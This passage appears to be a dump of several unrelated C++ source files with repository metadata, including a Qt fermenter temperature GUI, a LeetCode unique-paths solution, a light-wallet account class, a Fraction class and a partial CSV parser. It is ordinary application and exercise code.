i<8; i++) { temperaturas.temp[i] = 18.00; termometros[i]->setMaximum(35.00); termometros[i]->setMinimum(-5.00); } UpdateTemps(); sliders[0] = ui->verticalSlider; sliders[1] = ui->verticalSlider_2; sliders[2] = ui->verticalSlider_3; sliders[3] = ui->verticalSlider_4; sliders[4] = ui->verticalSlider_5; sliders[5] = ui->verticalSlider_6; sliders[6] = ui->verticalSlider_7; sliders[7] = ui->verticalSlider_8; edit_target[0] = ui->doubleSpinBox; edit_target[1] = ui->doubleSpinBox_2; edit_target[2] = ui->doubleSpinBox_3; edit_target[3] = ui->doubleSpinBox_4; edit_target[4] = ui->doubleSpinBox_5; edit_target[5] = ui->doubleSpinBox_6; edit_target[6] = ui->doubleSpinBox_7; edit_target[7] = ui->doubleSpinBox_8; for(int i = 0; i<8; i++) { edit_target[i]->setMaximum(40.00); edit_target[i]->setMinimum(-10.00); } ui->fecha1Historico->setDate(QDate::currentDate().addMonths(-1)); ui->fecha2Historico->setDateTime(QDateTime::currentDateTime()); salidaAct[0] = ui->habilitadoCheckBox1; salidaAct[1] = ui->habilitadoCheckBox2; salidaAct[2] = ui->habilitadoCheckBox3; salidaAct[3] = ui->habilitadoCheckBox4; salidaAct[4] = ui->habilitadoCheckBox5; salidaAct[5] = ui->habilitadoCheckBox6; salidaAct[6] = ui->habilitadoCheckBox7; salidaAct[7] = ui->habilitadoCheckBox8; frioHab[0] = ui->frioCheckBox; frioHab[1] = ui->frioCheckBox_2; frioHab[2] = ui->frioCheckBox_3; frioHab[3] = ui->frioCheckBox_4; frioHab[4] = ui->frioCheckBox_5; frioHab[5] = ui->frioCheckBox_6; frioHab[6] = ui->frioCheckBox_7; frioHab[7] = ui->frioCheckBox_8; calorHab[0] = ui->calorCheckBox; calorHab[1] = ui->calorCheckBox_2; calorHab[2] = ui->calorCheckBox_3; calorHab[3] = ui->calorCheckBox_4; calorHab[4] = ui->calorCheckBox_5; calorHab[5] = ui->calorCheckBox_6; calorHab[6] = ui->calorCheckBox_7; calorHab[7] = ui->calorCheckBox_8; frioSal[0] = ui->salidaFrioLineEdit; frioSal[1] = ui->salidaFrioLineEdit_2; frioSal[2] = ui->salidaFrioLineEdit_3; frioSal[3] = ui->salidaFrioLineEdit_4; frioSal[4] = ui->salidaFrioLineEdit_5; frioSal[5] = ui->salidaFrioLineEdit_6; frioSal[6] = ui->salidaFrioLineEdit_7; frioSal[7] = ui->salidaFrioLineEdit_8; calorSal[0] = ui->salidaCalorLineEdit; calorSal[1] = ui->salidaCalorLineEdit_2; calorSal[2] = ui->salidaCalorLineEdit_3; calorSal[3] = ui->salidaCalorLineEdit_4; calorSal[4] = ui->salidaCalorLineEdit_5; calorSal[5] = ui->salidaCalorLineEdit_6; calorSal[6] = ui->salidaCalorLineEdit_7; calorSal[7] = ui->salidaCalorLineEdit_8; led_frio[0] = ui->fled1; led_frio[1] = ui->fled2; led_frio[2] = ui->fled3; led_frio[3] = ui->fled4; led_frio[4] = ui->fled5; led_frio[5] = ui->fled6; led_frio[6] = ui->fled7; led_frio[7] = ui->fled8; led_calor[0] = ui->hled1; led_calor[1] = ui->hled2; led_calor[2] = ui->hled3; led_calor[3] = ui->hled4; led_calor[4] = ui->hled5; led_calor[5] = ui->hled6; led_calor[6] = ui->hled7; led_calor[7] = ui->hled8; } /******************************************************************************************************************/ /******************************************************************************************************************/ /* Slot for spin box for plot maximum value on y axis */ /******************************************************************************************************************/ void MainWindow::on_spinAxesMax_valueChanged(int arg1) { ui->plot->yAxis->setRangeUpper(arg1); ui->plot->replot(); } /******************************************************************************************************************/ /******************************************************************************************************************/ /* Slot for spin box for plot minimum value on y axis */ /******************************************************************************************************************/ void MainWindow::on_spinAxesMin_valueChanged(int arg1) { ui->plot->yAxis->setRangeLower(arg1); ui->plot->replot(); } /******************************************************************************************************************/ /******************************************************************************************************************/ /* Spin box controls how many data points are collected and displayed */ /******************************************************************************************************************/ void MainWindow::on_spinPoints_valueChanged(int arg1) { NUMBER_OF_POINTS = arg1; ui->plot->replot(); } /******************************************************************************************************************/ /******************************************************************************************************************/ /* Spin box for changing the Y Tick step */ /******************************************************************************************************************/ void MainWindow::on_spinYStep_valueChanged(int arg1) { ui->plot->yAxis->setTickStep(arg1); ui->plot->replot(); } /******************************************************************************************************************/ void MainWindow::SetActualTemp(int fermentador, double temp) { if( fermentador >=0 && fermentador<8) { termometros[fermentador]->setValue(temp); temps_actuales[fermentador]->setText(QString::number(temp)+" ºC"); } } void MainWindow::UpdateTemps() { for(int i = 0; i < CANT; i++) { SetActualTemp(i, temperaturas.temp[i]); } } void MainWindow::UpdateTargets() { for(int i = 0; i < CANT; i++) { edit_target[i]->setValue(temp_target.set_temp[i]); } } void MainWindow::UpdateConfig() { /* uint8_t frio; // Utilizo los bits como booleanos uint8_t calor; // Utilizo los bits como booleanos uint8_t salida_frio[8]; uint8_t salida_calor[8]; uint8_t habilitado; // Utilizo los bits como booleanos uint8_t fulltime; float temp[2]; QCheckBox *salidaAct[CANT]; QCheckBox *frioHab[CANT]; QCheckBox *calorHab[CANT]; QLineEdit *frioSal[CANT]; QLineEdit *calorSal[CANT]; uint8_t estado_bombas; uint8_t estado_salidas_cold, estado_salidas_hot; */ uint8_t tmp; uint8_t mask = 0x01; for(int i = 0; i < CANT; i++) { qDebug() << "Mascara = "<< (int)mask; tmp = configuracion.frio&mask; qDebug() << "FRIO Luego de mascara = "<< tmp; if(tmp>0) { frioHab[i]->setChecked(1); } else { frioHab[i]->setChecked(0); } tmp = configuracion.calor&mask; qDebug() << "CALOR Luego de mascara = "<< tmp; if(tmp>0) { calorHab[i]->setChecked(1); } else { calorHab[i]->setChecked(0); } tmp = configuracion.habilitado&mask; qDebug() << "HABILITADO Luego de mascara = "<< tmp; if(tmp>0) { salidaAct[i]->setChecked(1); } else { salidaAct[i]->setChecked(0); } frioSal[i]->setText(QString::number(configuracion.salida_frio[i])); calorSal[i]->setText(QString::number(configuracion.salida_calor[i])); // Prendo Leds de valvulas frio tmp = configuracion.estado_salidas_cold&mask; if(tmp>0) { led_frio[i]->setChecked(1); } else { led_frio[i]->setChecked(0); } // Prendo Leds de valvulas frio tmp = configuracion.estado_salidas_hot&mask; if(tmp>0) { led_calor[i]->setChecked(1); } else { led_calor[i]->setChecked(0); } mask = mask*2; } ui->temp9Label->setText(QString::number(configuracion.temp[0])); ui->temp10Label->setText(QString::number(configuracion.temp[1])); ui->fullTimeCheckBox->setChecked((bool)configuracion.fulltime); } void MainWindow::on_verticalSlider_valueChanged(int value) { edit_target[0]->setValue(CalcRange(value)); ui->progressBar->setValue(value); } void MainWindow::on_verticalSlider_2_valueChanged(int value) { edit_target[1]->setValue(CalcRange(value)); //ui->progressBar->setValue(value); } void MainWindow::on_verticalSlider_3_valueChanged(int value) { edit_target[2]->setValue(CalcRange(value)); //ui->progressBar->setValue(value); } void MainWindow::on_verticalSlider_4_valueChanged(int value) { edit_target[3]->setValue(CalcRange(value)); //ui->progressBar->setValue(value); } void MainWindow::on_verticalSlider_5_valueChanged(int value) { edit_target[4]->setValue(CalcRange(value)); //ui->progressBar->setValue(value); } void MainWindow::on_verticalSlider_6_valueChanged(int value) { edit_target[5]->setValue(CalcRange(value)); //ui->progressBar->setValue(value); } void MainWindow::on_verticalSlider_7_valueChanged(int value) { edit_target[6]->setValue(CalcRange(value)); //ui->progressBar->setValue(value); } void MainWindow::on_verticalSlider_8_valueChanged(int value) { edit_target[7]->setValue(CalcRange(value)); //ui->progressBar->setValue(value); } void MainWindow::on_doubleSpinBox_valueChanged(double arg1) { sliders[0]->setValue(CalcRange(arg1)); } void MainWindow::on_doubleSpinBox_2_valueChanged(double arg1) { sliders[1]->setValue(CalcRange(arg1)); } void MainWindow::on_doubleSpinBox_3_valueChanged(double arg1) { sliders[2]->setValue(CalcRange(arg1)); } void MainWindow::on_doubleSpinBox_4_valueChanged(double arg1) { sliders[3]->setValue(CalcRange(arg1)); } void MainWindow::on_doubleSpinBox_5_valueChanged(double arg1) { sliders[4]->setValue(CalcRange(arg1)); } void MainWindow::on_doubleSpinBox_6_valueChanged(double arg1) { sliders[5]->setValue(CalcRange(arg1)); } void MainWindow::on_doubleSpinBox_7_valueChanged(double arg1) { sliders[6]->setValue(CalcRange(arg1)); } void MainWindow::on_doubleSpinBox_8_valueChanged(double arg1) { sliders[7]->setValue(CalcRange(arg1)); } conf MainWindow::getConfigFromForm() { /* uint8_t frio; // Utilizo los bits como booleanos uint8_t calor; // Utilizo los bits como booleanos uint8_t salida_frio[8]; uint8_t salida_calor[8]; uint8_t habilitado; // Utilizo los bits como booleanos uint8_t fulltime; float temp[2]; QCheckBox *salidaAct[CANT]; QCheckBox *frioHab[CANT]; QCheckBox *calorHab[CANT]; QLineEdit *frioSal[CANT]; QLineEdit *calorSal[CANT]; */ uint8_t tmp; uint8_t mask = 0x01; conf t; t.frio = 0; t.calor = 0; t.habilitado = 0; if(ui->fullTimeCheckBox->isChecked()) { t.fulltime = 0x01; } for(int i = 0; i < CANT; i++) { qDebug() << "Mascara = "<< (int)mask; t.salida_frio[i] = this->frioSal[i]->text().toUInt(); t.salida_calor[i] = this->calorSal[i]->text().toUInt(); t.frio += frioHab[i]->isChecked()*mask; t.calor += calorHab[i]->isChecked()*mask; t.habilitado += salidaAct[i]->isChecked()*mask; mask = mask*2; } return t; }
1bbfa938e4f2cd96a169d94ca892871f3cd2f91b
95c3f1077ec6356fa1b5de3ddd00658f35337211
/lt_062_unique_paths.cpp
4e32d2579c8f0404ff45e336be6f0feb42a20e4a
[]
no_license
bowcharn/leetcode
5e6b45be32d00f508aad7c04e66297ccad1f7610
3a54cab040a74f8003261e629e32c388eae23277
refs/heads/master
2020-04-06T03:32:21.105443
2014-09-03T15:32:31
2014-09-03T15:32:31
null
0
0
null
null
null
null
UTF-8
C++
false
false
843
cpp
lt_062_unique_paths.cpp
/* A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below). The robot can only move either down or right at any point in time. The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below). How many possible unique paths are there? Above is a 3 x 7 grid. How many possible unique paths are there? Note: m and n will be at most 100. */ class Solution { public: int uniquePaths(int m, int n) { int N = (m -1) + (n -1); // total steps should be int k = m-1; // number of step need to go down double res = 1.0; // here we calculate the total possible path number // Combination(N, k) = Combination(N, N - k) for(int i = 1; i <=k; i++) res = res*(N-k+i) / i; return (int)res; } };
1350f7fbea60561b710cff29a02f69e7de4ccdc5
def70779aba60980f03a4b7ca58ec77ee9242296
/CppWinForm1/BankUnitTest/bankUnitTest.cpp
2155b313b20acce55ee115f6920a1ef4440546b5
[]
no_license
mariam2019/Software-Testing-Project
22f529126dabc3bbf2486bb0a2a85294992ea786
54a8dff6de0b39412e04951515af1ad2d21171d0
refs/heads/master
2020-04-10T05:41:59.051029
2018-12-08T07:39:54
2018-12-08T07:39:54
160,834,874
0
0
null
null
null
null
UTF-8
C++
false
false
221
cpp
bankUnitTest.cpp
#include "stdafx.h" #include "CppUnitTest.h" using namespace Microsoft::VisualStudio::CppUnitTestFramework; namespace BankUnitTest { TEST_CLASS(bankUnitTest) { public: TEST_METHOD(test_method) { } }; }
2ea9c0e9e3e4ccc53df74dff0c556a05e10303d3
880b8e40f6c531a66042a784ba58e6638be28530
/Primitive.h
c90b4c2f940e3f36d7b6f700cc6ed5243e7d6dbe
[]
no_license
pm34-rr/ComputerGraphics_1
cb43c18cd5d28d84b45cbebc6f445d0beb838141
9e0d2c619825c474a7db863b427640a88d2c692f
refs/heads/master
2021-01-10T06:18:33.605817
2016-02-14T15:51:01
2016-02-14T15:51:01
51,591,021
0
0
null
null
null
null
UTF-8
C++
false
false
491
h
Primitive.h
#pragma once #include "Common.h" class Primitive { public: Primitive(); void setPoint( const Point & pt, int i ); const Point & point( int i ); void setColor( const Color & clr ); const Color & getColor(); void setPointSize( GLfloat pointSize ); GLfloat pointSize(); void draw(); private: Triangle _triangle; Color _color; GLfloat _pointSize; // TODO_2: add other types of changing }; struct Collection { std::vector<Primitive> primitives; Color color; };
32ff3439517fbc4bd38e99e0c5b661013b4b0caf
b81c97bee2232a3f204eb73bd11b8ba101650676
/inc/Resource/BathroomItem/HairBrush.h
bde3a8a7c36c2d4fc88d5ce33c0f5f2a59021584
[]
no_license
bjones3/Resource-Distribution-Simulator
86d3282a5206667deb97234528cd05c580e29bf3
bb34faa5c1557e937b2aaaf4483018fcca841a71
refs/heads/master
2023-04-01T16:24:31.066563
2021-04-15T03:06:35
2021-04-15T03:06:35
299,432,138
0
0
null
null
null
null
UTF-8
C++
false
false
94
h
HairBrush.h
#ifndef HAIRBRUSH_H #define HAIRBRUSH_H class HairBrush { public: HairBrush(); }; #endif
f81aec4aa20cfc197bd6dd0ad9e2c4464c3c8281
b61fbef4fb2c9e52418a948498f69b12d14c88fa
/src/app/GFXMain.cpp
1fe1652a77d2330d003af3fcbfb273ef36d6a6bd
[ "MIT", "LicenseRef-scancode-unknown-license-reference" ]
permissive
jonfen/SilverSprint
58945d4691264a33edc9c822585f657e9f29ece5
b9caede84e837054dfd4d51f3ec6de98a62679f8
refs/heads/master
2020-05-25T00:18:53.893391
2017-06-21T19:12:36
2017-06-21T19:12:36
84,892,656
0
0
null
2017-03-14T01:44:01
2017-03-14T01:44:01
null
UTF-8
C++
false
false
3,576
cpp
GFXMain.cpp
// // GFXMain.cpp // GoldsprintsFX // // Created by Charlie Whitney on 8/27/14. // // #ifdef __linux //linux #include "../../include/app/GFXMain.h" #else // Windows & OSX #include "app/GFXMain.h" #endif using namespace ci; using namespace ci::app; using namespace std; using namespace gfx; GFXMain::GFXMain(){ } GFXMain::~GFXMain(){ CI_LOG_I("GFX main shutting down"); } void GFXMain::setup(){ // INIT -------------------------------------------------------------- mModel = Model::getInstance(); mGlobal = GFXGlobal::getInstance(); mSerialReader = SerialReaderRef( new SerialReader() ); mSerialReader->setup(); mStateManager = StateManager::getInstance(); // VIEWS -------------------------------------------------------------- mNav = NavBarViewRef(new NavBarView()); mRaceView = RaceViewRef(new RaceView()); mRosterView = RosterViewRef(new RosterView()); mSettingsView = SettingsViewRef(new SettingsView()); mNav->setup(); mRaceView->setup(); mRosterView->setup(); // EVENTS -------------------------------------------------------------- getWindow()->getSignalKeyDown().connect(std::bind(&GFXMain::onKeyDown, this, std::placeholders::_1)); mStateManager->signalOnRaceFinished.connect( bind( &GFXMain::onRaceFinished, this ) ); mStateManager->signalOnStateChange.connect( bind( &GFXMain::onAppStateChaged, this, std::placeholders::_1 ) ); mStateManager->signalOnRaceStateChange.connect( bind( &GFXMain::onRaceStateChanged, this, std::placeholders::_1 ) ); mStateManager->signalRacerFinish.connect( [&](int _id, int _millis){ mModel->playerData[_id]->setFinished(_millis); }); // START -------------------------------------------------------------- mStateManager->changeAppState( APP_STATE::RACE, true ); mStateManager->changeRaceState( RACE_STATE::RACE_STOPPED, true ); } void GFXMain::onRaceFinished() { console() << "GFXMAIN :: RACE FINSIHED" << endl; mSerialReader->stopRace(); mStateManager->changeRaceState( RACE_STATE::RACE_COMPLETE ); } void GFXMain::onAppStateChaged( APP_STATE as ) { } void GFXMain::onRaceStateChanged( RACE_STATE rc ){ if( rc == RACE_STATE::RACE_STARTING ){ mModel->resetPlayers(); mSerialReader->setRaceLengthTicks( mModel->getRaceLengthTicks() ); mSerialReader->startRace(); } else if( rc == RACE_STATE::RACE_STOPPED ){ mSerialReader->stopRace(); // mModel->resetPlayers(); mModel->elapsedRaceTimeMillis = 0.0; } } void GFXMain::onKeyDown(KeyEvent event){ if( !event.isAccelDown() && !event.isControlDown() ){ return; } else if( event.getChar() == 'r'){ mRaceView->reloadShader(); } else if( event.getChar() == 'm'){ mSerialReader->setMockMode(); } } void GFXMain::resetPlayerData(){ for( int i=0; i<mModel->playerData.size(); i++){ mModel->playerData[i]->reset(); mModel->playerData[i]->setRollerDiameter(mModel->getRollerDiameterMm()); } } void GFXMain::update() { double start_t, end_t; start_t = getElapsedSeconds(); mSerialReader->update(); end_t = getElapsedSeconds(); // console() << "SerialReader update time :: " << start_t << " -- " << (end_t - start_t) << endl; mRaceView->update(); mRosterView->update(); mSettingsView->update(); } void GFXMain::draw( const Rectf &drawRect ){ // mGlobal->setScale(drawRect); mRaceView->draw(); mRosterView->draw(); mSettingsView->draw(); mNav->draw(); }
601417199dbe87a98717027de1b0200b82b0d56e
36b4665968398d3ecd3df29023a4ad2f56041d72
/programs/light_wallet/Account.cpp
221fd823ed31fd12e61b8d4e86a992cd8ac96d30
[]
no_license
FilmChain/FilmChain
94f484b542c260cad4c05066364c247e50876e59
ee522a96bbc43ea503f638eb85b4468ada32cbab
refs/heads/master
2020-03-25T16:49:32.388849
2018-08-08T07:01:28
2018-08-08T07:01:28
143,949,162
1
0
null
null
null
null
UTF-8
C++
false
false
6,948
cpp
Account.cpp
#include <mcc/blockchain/types.hpp> #include <QStringList> #include "Account.hpp" #include "QtConversions.hpp" using std::string; TransactionSummary* Account::buildSummary(mcc::wallet::transaction_ledger_entry trx) { QList<LedgerEntry*> ledger; wdump((trx)); for( auto label : trx.delta_labels ) { QStringList participants = convert(label.second).split('>'); if( participants.size() == 1 ) participants.prepend(tr("Unknown")); for( mcc::blockchain::asset amount : trx.delta_amounts[label.second] ) { auto asset = m_wallet->get_asset_record(amount.asset_id); if( !asset ) continue; LedgerEntry* entry = new LedgerEntry(); entry->setProperty("sender", participants.first()); entry->setProperty("receiver", participants.last()); entry->setProperty("amount", double(amount.amount) / asset->precision); entry->setProperty("symbol", convert(asset->symbol)); if( trx.operation_notes.count(label.first) ) entry->setProperty("memo", convert(trx.operation_notes[label.first])); auto& yields = trx.delta_amounts["Yield"]; auto asset_yield = std::find_if(yields.begin(), yields.end(), [amount] (const mcc::blockchain::asset& a) { return a.asset_id == amount.asset_id; }); if( asset_yield != yields.end() ) entry->setProperty("yield", double(asset_yield->amount) / asset->precision); ledger.append(entry); } } TransactionSummary* summary = new TransactionSummary(convert(string(trx.id)), trx.timestamp, std::move(ledger), this); if( trx.delta_amounts.count("Fee") && trx.delta_amounts["Fee"].size() ) { auto fee = trx.delta_amounts["Fee"].front(); if( mcc::blockchain::oasset_record record = m_wallet->get_asset_record(fee.asset_id) ) { summary->setProperty("feeAmount", convert(record->amount_to_string(fee.amount, false)).remove(QRegExp("0*$"))); summary->setProperty("feeSymbol", convert(record->symbol)); } } summary->setProperty("timestamp", convert(fc::get_approximate_relative_time_string(trx.timestamp))); return summary; } Account::Account(mcc::light_wallet::light_wallet* wallet, const mcc::blockchain::account_record& account, QObject* parent) : QObject(parent), m_wallet(wallet), m_name(convert(account.name)), m_ownerKey(convert(std::string(account.owner_key))), m_activeKey(convert(std::string(account.active_key()))), m_isRegistered(account.registration_date != fc::time_point_sec()), m_registrationDate(convert(account.registration_date)) {} Account& Account::operator=(const mcc::blockchain::account_record& account) { m_name = convert(account.name); m_ownerKey = convert(std::string(account.owner_key)); m_activeKey = convert(std::string(account.active_key())); m_isRegistered = (account.registration_date != fc::time_point_sec()); m_registrationDate = convert(account.registration_date); Q_EMIT nameChanged(m_name); Q_EMIT ownerKeyChanged(m_ownerKey); Q_EMIT activeKeyChanged(m_activeKey); Q_EMIT isRegisteredChanged(m_isRegistered); Q_EMIT registrationDateChanged(m_registrationDate); return *this; } QQmlListProperty<Balance> Account::balances() { auto count = [](QQmlListProperty<Balance>* list) -> int { return static_cast<QList<Balance*>*>(list->data)->size(); }; auto at = [](QQmlListProperty<Balance>* list, int index) -> Balance* { return static_cast<QList<Balance*>*>(list->data)->at(index); }; while( !balanceList.empty() ) balanceList.takeFirst()->deleteLater(); for( auto balance : m_wallet->balance(convert(m_name)) ) balanceList.append(new Balance(convert(balance.first), balance.second.first, balance.second.second, this)); return QQmlListProperty<Balance>(this, &balanceList, count, at); } Balance* Account::balance(QString symbol) { return new Balance(symbol, m_wallet->balance(convert(m_name))[convert(symbol)]); } QStringList Account::availableAssets() { QStringList assets; for( auto balance : m_wallet->balance(convert(m_name)) ) if( balance.second.first > 0 || balance.second.second > 0 ) assets.append(convert(balance.first)); return assets; } QList<QObject*> Account::transactionHistory(QString asset_symbol) { try { auto raw_transactions = m_wallet->transactions(convert(m_name), convert(asset_symbol)); std::sort(raw_transactions.rbegin(), raw_transactions.rend(), [](const mcc::wallet::transaction_ledger_entry& a, const mcc::wallet::transaction_ledger_entry& b) { return a.timestamp < b.timestamp; }); int position = 0; for( mcc::wallet::transaction_ledger_entry trx : raw_transactions ) { if( std::find_if(transactionList[asset_symbol].begin(), transactionList[asset_symbol].end(), [&trx] (QObject* o) -> bool { return o->property("id").toString() == convert(string(trx.id)); }) != transactionList[asset_symbol].end() ) continue; transactionList[asset_symbol].insert(position++, buildSummary(std::move(trx))); } } catch( fc::exception& e ) { elog("Unhandled exception: ${e}", ("e", e.to_detail_string())); Q_EMIT error(tr("Internal error while building transaction history")); } return transactionList[asset_symbol]; } TransactionSummary* Account::beginTransfer(QString recipient, QString amount, QString symbol, QString memo) { try { pending_transaction = m_wallet->prepare_transfer(convert(amount), convert(symbol), convert(m_name), convert(recipient), convert(memo)); } catch (const fc::exception& e) { qDebug() << "Failed to transfer:" << e.to_detail_string().c_str(); return nullptr; } auto summary = buildSummary(m_wallet->summarize(convert(m_name), pending_transaction)); summary->setParent(nullptr); summary->setProperty("timestamp", QStringLiteral("Pending")); connect(summary, &QObject::destroyed, [] { qDebug() << "Summary cleaned"; }); return summary; } bool Account::completeTransfer(QString password) { try { return m_wallet->complete_transfer(convert(m_name), convert(password), pending_transaction); } catch( const fc::exception& e ) { if( e.get_log().size() ) Q_EMIT error(convert(e.get_log().front().get_message())); else Q_EMIT error(QStringLiteral("Unknown error occurred.")); pending_transaction = fc::variant_object(); } return false; }
909fd6d9431a62e29f8d6458cfdb2f53635f5932
621891421f9991bb4b1bb86c455ea769f204e793
/A1_P2_20180146_20180198/A1_P2/A1_P2/Fraction.cpp
59918d4cc97b040ae2e53502c3d27c7b2a4a5168
[]
no_license
Abdelrhman-ammar/Assignment1-Data-Structure
090338e4feab8c375dba7ef706cbad5bf8585136
4e0c10b273e46336da4b8e2dc5bede17e18a96f3
refs/heads/master
2021-02-07T14:25:37.269158
2020-03-14T19:44:15
2020-03-14T19:44:15
244,036,902
1
0
null
null
null
null
UTF-8
C++
false
false
4,302
cpp
Fraction.cpp
#include "Fraction.h" #include <iostream> #include <string> using namespace std; int greatestCommonDivisors(int number1, int number2) { if (number1 == 0 && number2 == 0) { return 1; } if (number1 == 0) return number2; return greatestCommonDivisors(number2 % number1, number1); } Fraction::Fraction() :denominator(1), numerator(1) {} Fraction::Fraction(int numerator, int denominator) { if (denominator == 0 && numerator!=0) { cout << "Error: Denominator value cant be negative." << endl; denominator = 1; } int commonDicisor = greatestCommonDivisors(numerator, denominator); if (commonDicisor != 1) { numerator /= commonDicisor; denominator /= commonDicisor; } this->numerator = numerator; this->denominator = denominator; } Fraction Fraction::operator+(const Fraction object) { int commonDivisor; Fraction result; result.numerator = numerator * object.denominator + denominator * object.numerator; result.denominator = denominator * object.denominator; commonDivisor = greatestCommonDivisors(result.numerator, result.denominator); if (commonDivisor != 1) { result.numerator /= commonDivisor; result.denominator /= commonDivisor; } return result; } Fraction Fraction::operator-(const Fraction object) { int commonDivisor; Fraction result, fraction1 , fraction2 = object; fraction1.numerator = numerator; fraction1.denominator = denominator; //make to fraction has same denominator fraction1.denominator *= fraction2.denominator; fraction1.numerator *= fraction2.denominator; fraction2.numerator *= denominator; fraction2.denominator *= denominator; //============================================ result.numerator = fraction1.numerator - fraction2.numerator; result.denominator = fraction1.denominator; commonDivisor = greatestCommonDivisors(result.numerator, result.denominator); if (commonDivisor != 1) { result.numerator /= commonDivisor; result.denominator /= commonDivisor; } return result; } Fraction Fraction::operator*(const Fraction object) { int commonDivisor; Fraction result; result.numerator = numerator * object.numerator; result.denominator = denominator * object.denominator; commonDivisor = greatestCommonDivisors(result.numerator, result.denominator); if (commonDivisor != 1) { result.numerator /= commonDivisor; result.denominator /= commonDivisor; } return result; } Fraction Fraction::operator/(const Fraction object) { Fraction result, fraction2; if (object.numerator == 0 && object.denominator == 0) { cout << "Error cant Divide By Zero" << endl; return result; } fraction2.numerator = object.denominator; fraction2.denominator = object.numerator; result = *this * fraction2; return result; } bool Fraction::operator==(const Fraction object) { return(numerator == object.numerator && denominator == object.denominator); } bool Fraction::operator<(const Fraction object) { return((numerator / denominator) < (object.numerator / object.denominator)); } bool Fraction::operator>(const Fraction object) { return((numerator / denominator) > (object.numerator / object.denominator)); } bool Fraction::operator<=(const Fraction object) { return((numerator / denominator) <= (object.numerator / object.denominator)); } bool Fraction::operator>=(const Fraction object) { return((numerator / denominator) >= (object.numerator / object.denominator)); } /*===================================================================================================================*/ istream& operator>>(istream& input, Fraction& object) { string devide; input >> object.numerator; input >> devide; input >> object.denominator; while ((object.denominator == 0 && object.numerator != 0 )|| devide != "/") { cout << "Error: Denominator value cant be negative and sign must be '/' ex 1/3." << endl; cout << "Enter The Fraction Again:__"; input >> object.numerator; input >> devide; input >> object.denominator; } int commonDicisor = greatestCommonDivisors(object.numerator, object.denominator); if (commonDicisor != 1) { object.numerator /= commonDicisor; object.denominator /= commonDicisor; } return input; } ostream& operator<<(ostream& output, const Fraction& object) { output << object.numerator << '/' << object.denominator; return output; }
839ad896b65e6c338f36d419ea82e6b6d2de87b9
86a20b33ed9df1423a54926d5ae7cd0ad92bb1be
/src/csv.hpp
6ede5928ecd50ed9ee1e2afa157f2e2b45f0b809
[ "MIT" ]
permissive
LinuxDevon/csv_parser_cpp
fbcee95a9a03cf8599ec89eb2696649e1125a29d
a5c763b0ffa810f7ccc51e75a3081f1dfbda5910
refs/heads/master
2021-02-16T17:48:04.179099
2020-04-01T21:41:48
2020-04-01T23:33:17
245,030,962
0
0
null
null
null
null
UTF-8
C++
false
false
6,284
hpp
csv.hpp
/* This is the header source file for the csv reader / dictionary classes. MIT License Copyright (c) 2020 LinuxDevon Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. */ // -- INCLUDES -- // #include <string> #include <exception> #include <fstream> #include <sstream> #include <algorithm> #include <iterator> #include <iostream> // -- DEFUALTS -- // #define DEFAULT_HEADER_ROW 0 #define DEFAULT_LINE_DELIMITER ',' #define DEFAULT_LINE_ENDING '\r\n' namespace String { template <class Container> void Split(const std::string& str, Container& cont, char delim = ' ') { std::stringstream ss(str); std::string token; while (std::getline(ss, token, delim)) { cont.push_back(token); } } /** * This is a safe non line ending specific getline function. This is to help with files * carried over from different systems. i.e Unix file comes to Windows with LF endings * instead of CRLF. * * @param stream [description] * @param line [description] * @return [description] */ std::istream & getline( std::istream & stream, std::string & line ) { std::string newline; std::getline( stream, newline ); // Windows CRLF (\r\n) if ( newline.size() && newline[newline.size()-1] == '\r' ) { line = newline.substr( 0, newline.size() - 1 ); // MacOS LF (\r) } else if (newline.size() && newline[newline.size()] == '\r') { line = newline.replace(newline.size(), 1, "\n"); } else { line = newline; } return stream; } } namespace CSV { class Dialect { public: Dialect(const std::string delimiter, const bool doublequote, const char escapechar, const char lineending, const char quotechar, const bool skipinitialspace) : delimiter(delimiter), doublequote(doublequote), escapechar(escapechar), lineending(lineending), quotechar(quotechar), skipinitialspace(skipinitialspace) {} const std::string delimiter; const bool doublequote; const char escapechar; const char lineending; const char quotechar; // const char quoting; const bool skipinitialspace; // const bool strict; protected: private: }; class Sniffer { public: static Dialect Sniff(const std::string filename, const std::vector<char> delimiters = std::vector<char>{','} ) noexcept(false) { CheckIfValidFile(filename); return DetectDialect(filename, delimiters); } /*static bool HasHeader(const std::string filename) noexcept(false) { Sniff(filename); return false; }*/ protected: private: static void CheckIfValidFile(const std::string filename) { // Open the given file into a stream std::ifstream InFile; InFile.open(filename, std::ios::in); // Check file and throw if file is bad if(InFile.bad()){ throw std::invalid_argument("Error reading the given input file. Reading and writing operation fail."); } else if(InFile.fail()) { throw std::invalid_argument("Error reading the given input file. Malformatted file or non exsistent file."); } else if(InFile.eof()) { throw std::invalid_argument("Error reading the given input file. End of file reached which means it was empty."); } } static Dialect DetectDialect(const std::string filename, const std::vector<char> delimiters) { // Open the given file into a stream std::ifstream InFile; std::string TempLine, delimiter; char escapechar, lineending, quotechar; InFile.open(filename, std::ios::in); String::getline(InFile, TempLine); // Identify the line ending for the file to parse with. // WINDOWS - CRLF if(TempLine[TempLine.size()-1] == '\r' && TempLine[TempLine.size()] == '\n') { delimiter = "\r\n"; } return Dialect(",", false, '\\', '\r', '"', true); } }; class Parser { public: // TODO: Make this pass in if it should throw Parser(const std::string filename) noexcept(false) : FileName(filename) { Sniffer::Sniff(filename); // Verify that the file is valid // HasHeader = Sniffer::HasHeader(filename); InFile.open(filename, std::ios::in); HeaderRowNumber = FindHeaderRow(); } ~Parser() {} const std::vector<std::string> & HeaderColumnName() { return HeaderNames; } // bool 